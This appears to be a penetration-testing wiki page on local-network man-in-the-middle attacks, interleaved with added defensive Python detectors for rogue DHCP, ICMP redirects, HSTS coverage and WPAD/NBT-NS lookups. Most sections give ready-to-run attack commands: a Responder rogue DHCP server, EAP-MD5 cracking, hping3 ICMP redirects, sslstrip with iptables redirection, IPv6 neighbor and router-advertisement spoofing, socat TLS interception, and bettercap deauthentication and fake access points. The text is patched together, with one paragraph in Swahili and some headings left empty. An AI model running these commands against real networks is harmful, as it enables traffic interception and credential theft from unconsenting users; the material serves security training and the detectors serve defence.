A rogue DHCP server can be set up using the DHCP script located at /usr/share/responder/DHCP.py. This is useful for network attacks, like capturing HTTP traffic and credentials, by redirecting traffic to a malicious server. However, setting a rogue gateway is less effective as it only allows capturing outbound traffic from the client, missing the responses from the real gateway. Instead, setting up a rogue DNS or WPAD server is recommended for a more effective attack.

Below are the command options for configuring the rogue DHCP server:

  • Our IP Address (Gateway Advertisement): Use -i 10.0.0.100 to advertise your machine's IP as the gateway.
  • Local DNS Domain Name: Optionally, use -d example.org to set a local DNS domain name.
  • Original Router/Gateway IP: Use -r 10.0.0.1 to specify the IP address of the legitimate router/gateway.
  • Primary DNS Server IP: Use -p 10.0.0.100 to set the IP address of the rogue DNS server you control.
  • Secondary DNS Server IP: Optionally, use -s 10.0.0.1 to set a secondary DNS server IP.
  • Netmask of Local Network: Use -n 255.255.255.0 to define the netmask for the local network.
  • Interface for DHCP Traffic: Use -I eth1 to listen for DHCP traffic on a specific network interface.
  • WPAD Configuration Address: Use -w "http://10.0.0.100/wpad.dat" to set the address for WPAD configuration, assisting in web traffic interception.
  • Spoof Default Gateway IP: Include -S to spoof the default gateway IP address.
  • Respond to All DHCP Requests: Include -R to make the server respond to all DHCP requests, but be aware that this is noisy and can be detected.

By correctly using these options, a rogue DHCP server can be established to intercept network traffic effectively.

```bash
# Example to start a rogue DHCP server with specified options
python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R
```
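Every value the rogue server pushes (gateway, DNS, WPAD URL, server identifier) is visible in the DHCPOFFER/DHCPACK it sends, so a listener on the segment can compare offers against the servers that are supposed to exist. The following is an added example (not HackTricks or Responder code): a DHCP option parser and an allowlist check; the sample DHCPOFFER is constructed inline to mirror the options above, not captured from a real server.

```python
"""Parse a raw DHCP message (BOOTP header + options) and flag rogue offers."""
import struct
from typing import Dict, List, Set

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_WPAD = 3, 6, 53, 54, 252
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}


def _ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def _ip4(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))


def parse_dhcp(msg: bytes) -> Dict[str, object]:
    """Extract the fields a rogue-server check needs; raises ValueError on malformed input."""
    if len(msg) < 240 or msg[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    info: Dict[str, object] = {"op": msg[0], "xid": struct.unpack("!I", msg[4:8])[0],
                               "yiaddr": _ip(msg[16:20]), "type": None, "server_id": None,
                               "router": [], "dns": [], "wpad": None}
    i = 240
    while i < len(msg):
        code = msg[i]
        if code == 255:          # end option
            break
        if code == 0:            # pad option has no length byte
            i += 1
            continue
        if i + 1 >= len(msg):
            raise ValueError("truncated option header")
        length = msg[i + 1]
        data = msg[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError("truncated option data")
        if code == OPT_MSG_TYPE and length == 1:
            info["type"] = MSG_TYPES.get(data[0], str(data[0]))
        elif code == OPT_SERVER_ID and length == 4:
            info["server_id"] = _ip(data)
        elif code in (OPT_ROUTER, OPT_DNS) and length % 4 == 0:
            key = "router" if code == OPT_ROUTER else "dns"
            info[key] = [_ip(data[j:j + 4]) for j in range(0, length, 4)]
        elif code == OPT_WPAD:
            info["wpad"] = data.decode("ascii", "replace")
        i += 2 + length
    return info


def rogue_findings(info: Dict[str, object], allowed_servers: Set[str],
                   allowed_gateways: Set[str]) -> List[str]:
    """Compare an OFFER/ACK against the servers and gateways that should exist."""
    findings: List[str] = []
    if info["type"] not in ("OFFER", "ACK"):
        return findings
    if info["server_id"] not in allowed_servers:
        findings.append(f"unknown DHCP server {info['server_id']}")
    for gw in info["router"]:
        if gw not in allowed_gateways:
            findings.append(f"unexpected gateway {gw}")
    for ns in info["dns"]:
        if ns not in allowed_servers | allowed_gateways:
            findings.append(f"unexpected DNS server {ns}")
    if info["wpad"]:
        findings.append(f"WPAD URL pushed: {info['wpad']}")
    return findings


def _opt(code: int, data: bytes) -> bytes:
    return bytes([code, len(data)]) + data


def sample_rogue_offer() -> bytes:
    """Constructed DHCPOFFER carrying the rogue options from the command above."""
    hdr = struct.pack("!BBBBIHH", 2, 1, 6, 0, 0x3903F326, 0, 0x8000)       # op=BOOTREPLY
    hdr += _ip4("0.0.0.0") + _ip4("10.0.0.50") + _ip4("10.0.0.100") + _ip4("0.0.0.0")  # ciaddr yiaddr siaddr giaddr
    hdr += bytes.fromhex("aabbccddeeff") + b"\x00" * 10                    # chaddr (16 bytes)
    hdr += b"\x00" * 192                                                    # sname(64) + file(128)
    opts = (_opt(OPT_MSG_TYPE, b"\x02") + _opt(OPT_SERVER_ID, _ip4("10.0.0.100"))
            + _opt(OPT_ROUTER, _ip4("10.0.0.100"))
            + _opt(OPT_DNS, _ip4("10.0.0.100") + _ip4("10.0.0.1"))
            + _opt(OPT_WPAD, b"http://10.0.0.100/wpad.dat") + b"\xff")
    return hdr + MAGIC_COOKIE + opts


def check_sample() -> List[str]:
    """Run the check with 10.0.0.1 as the only legitimate server and gateway (assumed)."""
    return rogue_findings(parse_dhcp(sample_rogue_offer()), {"10.0.0.1"}, {"10.0.0.1"})
```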

EAP Attacks

Here are some of the attack methods that can be used against 802.1X implementations:

  • Active brute-force password grinding via EAP
  • Attacking the RADIUS server with malformed EAP content (exploits)
  • EAP message capture and offline password cracking (EAP-MD5 and PEAP)
  • Forcing EAP-MD5 authentication to bypass TLS certificate validation
  • Injecting malicious network traffic upon authentication using a hub or similar

If the attacker is between the victim and the authentication server, he could try to degrade (if necessary) the authentication protocol to EAP-MD5 and capture the authentication attempt. Then, he could brute-force it using:

```bash
eapmd5pass -r pcap.dump -w /usr/share/wordlist/sqlmap.txt
```

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) is a class of network protocols designed to create a hot redundant routing system. With FHRP, physical routers can be combined into a single logical device, which increases fault tolerance and helps to distribute the load.

Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.

GLBP & HSRP Attacks

RIP

Three versions of the Routing Information Protocol (RIP) are known to exist: RIP, RIPv2, and RIPng. Datagrams are sent to peers via port 520 using UDP by RIP and RIPv2, whereas datagrams are broadcast to UDP port 521 via IPv6 multicast by RIPng. Support for MD5 authentication was introduced by RIPv2. On the other hand, native authentication is not incorporated by RIPng; instead, reliance is placed on optional IPsec AH and ESP headers within IPv6.

  • RIP and RIPv2: Communication is done through UDP datagrams on port 520.
  • RIPng: Utilizes UDP port 521 for broadcasting datagrams via IPv6 multicast.

Note that RIPv2 supports MD5 authentication while RIPng does not include native authentication, relying on IPsec AH and ESP headers within IPv6.

EIGRP Mashambulizi

EIGRP (Enhanced Interior Gateway Routing Protocol) ni itifaki ya routing inayobadilika. Ni itifaki ya distance-vector. Ikiwa hakuna uthibitishaji na usanidi wa interfaces passive, muvamizi anaweza kuingilia routing ya EIGRP na kusababisha uchafuzi wa jedwali za routing. Zaidi ya hayo, mtandao wa EIGRP (kwa maneno mengine, autonomous system) ni usawa na haugawiki katika maeneo yoyote. Ikiwa mshambuliaji ataingiza route, kuna uwezekano route hiyo itaenea katika mfumo mzima wa autonomous EIGRP.

Kushambulia mfumo wa EIGRP kunahitaji kuanzisha ujirani na router halali wa EIGRP, jambo ambalo hufungua fursa nyingi, kutoka reconnaissance ya msingi hadi aina mbalimbali za injections.

FRRouting inakuwezesha kutekeleza virtual router inayounga mkono BGP, OSPF, EIGRP, RIP na itifaki nyingine. Yote unayotakiwa kufanya ni kuitegemea kwenye mfumo wa mshambuliaji na unaweza kujionyesha kama router halali katika eneo la routing.

EIGRP Attacks

Coly has the capability to intercept EIGRP (Enhanced Interior Gateway Routing Protocol) broadcasts. It also allows packet injection, which can be used to alter routing configurations.

OSPF

In the Open Shortest Path First (OSPF) protocol, MD5 authentication is commonly used to secure communication between routers. However, this security measure can be compromised using tools such as Loki and John the Ripper. These tools can capture and crack MD5 hashes, exposing the authentication key. Once the key is obtained, it can be used to introduce new routing information. To configure the route parameters and set the compromised key, the Injection and Connection tabs are used respectively.

  • Capturing and Cracking MD5 Hashes: Tools like Loki and John the Ripper are used for this purpose.
  • Configuring Route Parameters: Done through the Injection tab.
  • Setting the Compromised Key: The key is configured under the Connection tab.

Other Generic Tools & Sources

  • Above: Tool to monitor network traffic and find vulnerabilities
  • You can find more information about network attacks here.

Spoofing

The attacker configures all the network parameters (GW, IP, DNS) of a new member of the network by sending fake DHCP responses.

bash
#Ettercap
yersinia dhcp -attack 2 #More parameters are needed
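From the defender's side the question is how to notice a rogue DHCP server handing out a gateway or DNS that is not yours. The following is an added example, not code from this page or from Ettercap/yersinia: it parses a DHCP message (RFC 2131 fixed fields plus RFC 2132 options), pulls out the message type (53), server identifier (54), router (3) and DNS (6) options, and reports every reply whose values are not in the approved sets. The replies it is tested against are constructed by `build_dhcp_reply`; the trusted addresses are placeholders.

```python
"""Flag DHCP replies whose server, gateway or DNS is not the approved one. Added example."""
import ipaddress
import struct
from typing import Dict, List

MAGIC_COOKIE = b"\x63\x82\x53\x63"
OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 3, 6, 53, 54, 255
MSG_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 5: "ACK", 6: "NAK"}


def parse_dhcp(msg: bytes) -> Dict:
    """Return the fields a rogue-server check needs from one DHCP message (UDP 67/68 payload)."""
    if len(msg) < 240 or msg[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    op = msg[0]                                   # 1 = BOOTREQUEST, 2 = BOOTREPLY
    yiaddr = ipaddress.IPv4Address(msg[16:20])    # address offered to the client
    options: Dict[int, bytes] = {}
    i = 240
    while i < len(msg):
        code = msg[i]
        if code == OPT_END:
            break
        if code == 0:                             # pad option has no length byte
            i += 1
            continue
        length = msg[i + 1]
        options[code] = msg[i + 2:i + 2 + length]
        i += 2 + length

    def ips(raw: bytes) -> List[str]:
        return [str(ipaddress.IPv4Address(raw[j:j + 4])) for j in range(0, len(raw) - 3, 4)]

    return {
        "op": "reply" if op == 2 else "request",
        "type": MSG_TYPES.get(options.get(OPT_MSG_TYPE, b"\x00")[0], "unknown"),
        "yiaddr": str(yiaddr),
        "server_id": ips(options.get(OPT_SERVER_ID, b""))[:1],
        "routers": ips(options.get(OPT_ROUTER, b"")),
        "dns": ips(options.get(OPT_DNS, b"")),
    }


def rogue_dhcp_findings(msg: bytes, trusted_servers, trusted_routers, trusted_dns) -> List[str]:
    """List every way a DHCP reply deviates from the approved configuration (empty = clean)."""
    d = parse_dhcp(msg)
    if d["op"] != "reply":
        return []
    findings = []
    for sid in d["server_id"]:
        if sid not in trusted_servers:
            findings.append(f"{d['type']} from unknown DHCP server {sid}")
    for router in d["routers"]:
        if router not in trusted_routers:
            findings.append(f"{d['type']} pushes unexpected default gateway {router}")
    for ns in d["dns"]:
        if ns not in trusted_dns:
            findings.append(f"{d['type']} pushes unexpected DNS server {ns}")
    return findings


def build_dhcp_reply(msg_type: int, yiaddr: str, server_id: str, router: str, dns: str) -> bytes:
    """Constructed BOOTREPLY used as a test fixture (xid and chaddr are dummies)."""
    fixed = struct.pack("!BBBBIHH4s4s4s4s", 2, 1, 6, 0, 0x1234, 0, 0,
                        bytes(4), ipaddress.IPv4Address(yiaddr).packed, bytes(4), bytes(4))
    fixed += bytes(16) + bytes(64) + bytes(128)   # chaddr, sname, file
    opts = (bytes([OPT_MSG_TYPE, 1, msg_type])
            + bytes([OPT_SERVER_ID, 4]) + ipaddress.IPv4Address(server_id).packed
            + bytes([OPT_ROUTER, 4]) + ipaddress.IPv4Address(router).packed
            + bytes([OPT_DNS, 4]) + ipaddress.IPv4Address(dns).packed
            + bytes([OPT_END]))
    return fixed + MAGIC_COOKIE + opts


if __name__ == "__main__":
    trusted = {"10.0.0.254"}   # placeholder: the one DHCP server this segment should have
    sample = build_dhcp_reply(2, "10.0.0.50", "10.0.0.66", "10.0.0.66", "10.0.0.66")
    print(rogue_dhcp_findings(sample, trusted, trusted, trusted))
```

Run it over the payload of every UDP datagram from port 67; on a switched network the long-term fix is DHCP snooping on the access switches so that replies are only accepted on the trusted uplink port, and this check then serves to verify that the snooping configuration actually holds.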

ARP Spoofing

Check the previous section.

ICMPRedirect

ICMP Redirect consists in sending an ICMP packet of type 5, code 1 (the -C 5 -K 1 of the hping3 command below) indicating that the attacker is the best way to reach an IP. Then, when the victim wants to contact that IP, it will send the packet through the attacker.

bash
#Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] from [2], route to [3] packets sent to [4] from [5]
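A redirect is only legitimate when it comes from the router the host is actually using, so detection reduces to "type 5 from anyone other than the known gateway". The code below is an added example (not from this page, Ettercap or hping3): it parses the outer IPv4 header, the ICMP header, the new gateway field and the embedded original IP header that tells you which destination the redirect tries to re-route. The packets are constructed in memory by `build_redirect` purely as test input; the addresses are placeholders.

```python
"""Spot ICMP Redirect (type 5) messages that do not come from the trusted gateway. Added example."""
import ipaddress
import struct
from typing import Optional

ICMP_REDIRECT = 5
REDIRECT_CODES = {0: "network", 1: "host", 2: "ToS+network", 3: "ToS+host"}


def parse_ipv4(packet: bytes):
    """Return (src, dst, protocol, payload) for an IPv4 packet, or None if it is not IPv4."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    src = ipaddress.IPv4Address(packet[12:16])
    dst = ipaddress.IPv4Address(packet[16:20])
    return src, dst, packet[9], packet[ihl:]


def inspect_redirect(packet: bytes, trusted_gateway: str) -> Optional[dict]:
    """Return a finding for an ICMP Redirect, or None if the packet is not one."""
    parsed = parse_ipv4(packet)
    if parsed is None or parsed[2] != 1:          # IP protocol 1 = ICMP
        return None
    src, dst, _proto, icmp = parsed
    if len(icmp) < 28 or icmp[0] != ICMP_REDIRECT:
        return None
    new_gateway = ipaddress.IPv4Address(icmp[4:8])
    # Bytes 8.. carry the IP header (+8 bytes) of the datagram that triggered the redirect;
    # its destination is the route the sender wants the victim to change.
    inner = parse_ipv4(icmp[8:])
    return {
        "from": str(src),
        "to": str(dst),
        "code": REDIRECT_CODES.get(icmp[1], str(icmp[1])),
        "new_gateway": str(new_gateway),
        "affected_destination": str(inner[1]) if inner else None,
        # Only the router we actually forward through may redirect us.
        "suspicious": str(src) != trusted_gateway,
    }


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Constructed IPv4 header (checksum zero; these bytes are never transmitted)."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return header + payload


def build_redirect(src: str, victim: str, new_gateway: str, affected_dst: str) -> bytes:
    """Constructed host redirect (type 5, code 1) as seen by `victim`, for testing only."""
    inner = build_ipv4(victim, affected_dst, 6, bytes(8))     # original header + 8 bytes
    body = struct.pack("!BBHI", ICMP_REDIRECT, 1, 0, int(ipaddress.IPv4Address(new_gateway)))
    return build_ipv4(src, victim, 1, body + inner)


if __name__ == "__main__":
    gateway = "10.0.0.254"   # placeholder for the segment's real default gateway
    print(inspect_redirect(build_redirect("10.0.0.66", "10.0.0.100", "10.0.0.66", "192.0.2.10"), gateway))
```

On Linux end hosts the preventive setting is `net.ipv4.conf.all.accept_redirects=0` (or, where redirects are needed, `secure_redirects=1` so only redirects from a configured gateway are honoured); the detector above is what you run on a span port to see whether anyone is still trying.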

DNS Spoofing

The attacker will resolve some (or all) of the domains that the victim requests.

bash
set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Configure your own DNS with dnsmasq

bash
apt-get install dnsmasq
echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.conf
echo "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the DNS
sudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Local Gateways

There are often multiple routes to systems and networks. After building a list of MAC addresses within the local network, use gateway-finder.py to identify hosts that support IPv4 forwarding.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

For local host name resolution when DNS lookups fail, Microsoft systems rely on Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS). Similarly, Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. Because these protocols are unauthenticated and operate over UDP by broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.

You can impersonate services that hosts search for by using Responder to send fake responses.
Read here more information about how to Impersonate services with Responder.

Spoofing WPAD

Browsers commonly use the Web Proxy Auto-Discovery (WPAD) protocol to obtain proxy settings automatically. This involves fetching configuration details from a server, typically via a URL like "http://wpad.example.org/wpad.dat". Clients can discover this server in several ways:

  • Through DHCP, where discovery is done using a special entry, code 252.
  • By DNS, which involves searching for a hostname labelled wpad within the local domain.
  • Via Microsoft LLMNR and NBT-NS, which are fallback mechanisms used when DNS lookups fail.

The tool Responder takes advantage of this protocol by acting as a malicious WPAD server. It uses DHCP, DNS, LLMNR and NBT-NS to trick clients into connecting to it. To learn more about how services can be impersonated using Responder check this.

Spoofing SSDP and UPnP devices

You can offer different services in the network to try to trick a user into entering some plain-text credentials. More information about this attack in Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

This attack is very similar to ARP Spoofing but in the IPv6 world. You can make the victim think the IPv6 address of the GW has the attacker's MAC.

bash
sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Some OSs configure the gateway by default from the RA packets sent in the network. To declare the attacker as an IPv6 router you can use:

bash
sysctl -w net.ipv6.conf.all.forwarding=1
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

By default some OSs try to configure DNS by reading a DHCPv6 packet in the network. Then, an attacker can send a DHCPv6 packet to configure himself as the DNS. DHCP also provides an IPv6 address to the victim.

bash
dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (fake page and JS code injection)

Internet Attacks

sslStrip

Basically what this attack does is: if the user tries to access an HTTP page that redirects to the HTTPS version, sslStrip will maintain an HTTP connection with the client and an HTTPS connection with the server, so it will be able to sniff the connection in plain text.

bash
apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all -l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

More info here.

sslStrip+ and dns2proxy for bypassing HSTS

The difference between sslStrip+ and dns2proxy compared to sslStrip is that they will redirect, for example, www.facebook.com to wwww.facebook.com (note the extra "w") and will set the address of this domain to the attacker's IP. This way, the client will connect to wwww.facebook.com (the attacker), but behind the scenes sslStrip+ will maintain the real connection via https with www.facebook.com.

The goal of this technique is to avoid HSTS, because wwww.facebook.com won't be saved in the browser's HSTS cache, so the browser will be tricked into performing Facebook authentication over HTTP.
Note that in order to perform this attack the victim has to try to access http://www.facebook.com first and not https. This can be done by modifying the links inside an http page.

More info here, here and here.

sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules preloaded in the browsers, so even if it's the first time a user accesses an "important" domain, they will access it via HTTPS. Also, note that the preloaded rules and other generated rules can use the flag includeSubdomains, so the wwww.facebook.com example from before won't work anymore as facebook.com uses HSTS with includeSubdomains.
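To make the includeSubdomains point concrete, here is a minimal model of a browser's HSTS store, an added example rather than any browser's real code: it learns policies from Strict-Transport-Security headers (RFC 6797: max-age required, includeSubDomains optional, max-age=0 clears the entry), carries preload entries that never expire, and answers whether an http:// URL for a given host will be rewritten to https:// before anything is sent. The facebook.com preload entry and the example.test header are constructed inputs mirroring the text above.

```python
"""Toy HSTS store showing why a look-alike subdomain only escapes HSTS without includeSubDomains."""
from typing import Dict, Optional, Tuple


class HstsStore:
    def __init__(self) -> None:
        # host -> (expiry timestamp, or None for a preload entry; includeSubDomains flag)
        self._policies: Dict[str, Tuple[Optional[float], bool]] = {}

    def preload(self, host: str, include_subdomains: bool) -> None:
        """Entry shipped with the browser: applies even on the very first visit, never expires."""
        self._policies[host.lower()] = (None, include_subdomains)

    def observe_header(self, host: str, header: str, now: float) -> None:
        """Learn a policy from a Strict-Transport-Security header received over HTTPS."""
        directives = {}
        for part in header.split(";"):
            name, _, value = part.strip().partition("=")
            directives[name.lower()] = value.strip().strip('"')
        if not directives.get("max-age", "").isdigit():
            return                                   # max-age is mandatory; ignore malformed headers
        max_age = int(directives["max-age"])
        if max_age == 0:
            self._policies.pop(host.lower(), None)   # max-age=0 removes the host's policy
            return
        self._policies[host.lower()] = (now + max_age, "includesubdomains" in directives)

    def must_use_https(self, host: str, now: float) -> bool:
        """True if the browser rewrites http://host to https:// before sending the request."""
        host = host.lower()
        labels = host.split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])         # host itself, then each parent domain
            policy = self._policies.get(candidate)
            if policy is None:
                continue
            expiry, include_subdomains = policy
            if expiry is not None and expiry <= now:
                continue                             # expired entry, no longer enforced
            if candidate == host or include_subdomains:
                return True
        return False


def stripping_blocked_by_hsts(store: HstsStore, requested_host: str, now: float) -> bool:
    """The look-alike host can only be kept on plain HTTP if no HSTS policy covers it."""
    return store.must_use_https(requested_host, now)


if __name__ == "__main__":
    store = HstsStore()
    store.preload("facebook.com", include_subdomains=True)   # constructed, mirrors the text above
    print("wwww.facebook.com upgraded:", stripping_blocked_by_hsts(store, "wwww.facebook.com", 0))
```

The walk from the full host up through its parents is what makes a preloaded `facebook.com` entry with includeSubDomains cover `wwww.facebook.com`; a policy learned only for `www.example.test` without the flag covers nothing else, which is the gap the technique above relied on.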

TODO: easy-creds, evilgrade, metasploit, factory

TCP listen on port

bash
sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL listen on port

Generate keys and self-signed certificate

bash
FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Listen using certificate

bash
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Listen using certificate and redirect to the hosts

bash
sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Sometimes, if the client checks that the CA is valid, you could serve a certificate of another hostname signed by a CA.
Another interesting test is to serve a certificate of the requested hostname but self-signed.

Other things to test are trying to sign the certificate with a valid certificate that is not a valid CA, or using the valid public key, forcing the use of an algorithm like Diffie-Hellman (one that doesn't need to decrypt anything with the real private key) and, when the client requests a proof of the real private key (such as a hash), sending a fake proof and expecting the client not to check it.

Bettercap

bash
# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Automatic Discovery Hints

Note that when a UDP packet is sent to a device that doesn't have the requested port open, an ICMP (Port Unreachable) is sent back.

ARP discovery

ARP packets are used to discover which IPs are being used within the network. The PC has to send a request for every possible IP address and only the ones in use will answer.

mDNS (multicast DNS)

Bettercap sends an mDNS request (every X ms) asking for _services._dns-sd._udp.local. The machine that sees this packet usually answers the request. Then, it only searches for machines answering to "services".

Tools

  • Avahi-browser (--all)
  • Bettercap (net.probe.mdns)
  • Responder

NBNS (NetBios Name Server)

Bettercap broadcasts packets to port 137/UDP asking for the name "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".
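The odd-looking "CKAAA..." name is the NetBIOS first-level encoding of "*" padded with NUL bytes (each byte becomes two letters in 'A'..'P'), i.e. a node-status wildcard query. The block below is an added example (not from this page, bettercap or Responder) serving both this section and the LLMNR/NBT-NS/mDNS and WPAD sections above: it classifies a UDP datagram by destination port (5355 LLMNR, 137 NBT-NS, 5353 mDNS), decodes the queried name (undoing the NetBIOS encoding where needed) and flags two things a defender cares about on a span port: wildcard NBT-NS sweeps, and any LLMNR/NBT-NS/mDNS lookup for "wpad", which means a client is about to take proxy settings from whoever answers first. All datagrams are constructed by `build_query`.

```python
"""Classify LLMNR / NBT-NS / mDNS queries from UDP payloads and decode the name asked for."""
from typing import Dict, List, Optional, Tuple

NAME_SERVICES = {5355: "LLMNR", 137: "NBT-NS", 5353: "mDNS"}


def read_dns_name(msg: bytes, offset: int) -> Tuple[str, int]:
    """Read a DNS-style label sequence (queries from these protocols use no compression)."""
    labels = []
    while True:
        length = msg[offset]
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), offset


def encode_netbios_name(name: str, suffix: int = 0x00, pad: bytes = b" ") -> str:
    """NetBIOS first-level encoding: 15 padded name bytes + 1 suffix byte -> 32 letters."""
    raw = name.encode("ascii").ljust(15, pad)[:15] + bytes([suffix])
    return "".join(chr(ord("A") + (b >> 4)) + chr(ord("A") + (b & 0xF)) for b in raw)


def decode_netbios_name(encoded: str) -> str:
    """Inverse of encode_netbios_name; returns NAME<suffix> with padding stripped."""
    if len(encoded) != 32:
        raise ValueError("NetBIOS encoded names are 32 characters")
    raw = bytes(((ord(encoded[i]) - ord("A")) << 4) | (ord(encoded[i + 1]) - ord("A"))
                for i in range(0, 32, 2))
    name = raw[:15].rstrip(b" \x00").decode("ascii", "replace")
    return f"{name}<{raw[15]:02x}>"


def classify_query(dst_port: int, payload: bytes) -> Optional[Dict]:
    """Return {service, name, id} for a name-resolution query, None for anything else."""
    service = NAME_SERVICES.get(dst_port)
    if service is None or len(payload) < 12:
        return None
    txid = int.from_bytes(payload[:2], "big")
    flags = int.from_bytes(payload[2:4], "big")
    qdcount = int.from_bytes(payload[4:6], "big")
    if flags & 0x8000 or qdcount == 0:          # QR bit set = a response, not a query
        return None
    name, _ = read_dns_name(payload, 12)
    if service == "NBT-NS":
        name = decode_netbios_name(name.split(".")[0])
    return {"service": service, "name": name, "id": txid}


def flag_query(query: Dict) -> Optional[str]:
    """Defender heuristics over one classified query."""
    first_label = query["name"].split(".")[0].lower()
    if query["service"] == "NBT-NS" and first_label.startswith("*<"):
        return "NBT-NS node-status wildcard query (host sweep)"
    if first_label.startswith("wpad"):
        return f"{query['service']} lookup for WPAD: proxy config will be trusted from whoever answers"
    return None


def build_query(labels: List[str], txid: int = 1) -> bytes:
    """Constructed DNS-format query with one question (the wire format all three share)."""
    header = txid.to_bytes(2, "big") + b"\x00\x00" + b"\x00\x01" + bytes(6)
    qname = b"".join(len(l).to_bytes(1, "big") + l.encode("ascii") for l in labels) + b"\x00"
    return header + qname + b"\x00\x01\x00\x01"   # QTYPE/QCLASS; not needed for classification


if __name__ == "__main__":
    wildcard = encode_netbios_name("*", pad=b"\x00")
    for port, labels in ((137, [wildcard]), (5355, ["wpad"]), (5353, ["_services", "_dns-sd", "_udp", "local"])):
        q = classify_query(port, build_query(labels))
        print(q, "->", flag_query(q))
```

A WPAD lookup that reaches LLMNR or NBT-NS at all means DNS did not answer for "wpad"; the usual mitigations are to disable LLMNR and NetBIOS over TCP/IP on Windows hosts via Group Policy, and to register a wpad record (or explicitly block the name) in internal DNS so the fallback never fires.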

SSDP (Simple Service Discovery Protocol)

Bettercap broadcasts SSDP packets searching for all kinds of services (UDP port 1900).

WSD (Web Service Discovery)

Bettercap broadcasts WSD packets searching for services (UDP port 3702).

Telecom / Mobile-Core (GTP) Exploitation

Telecom Network Exploitation

References
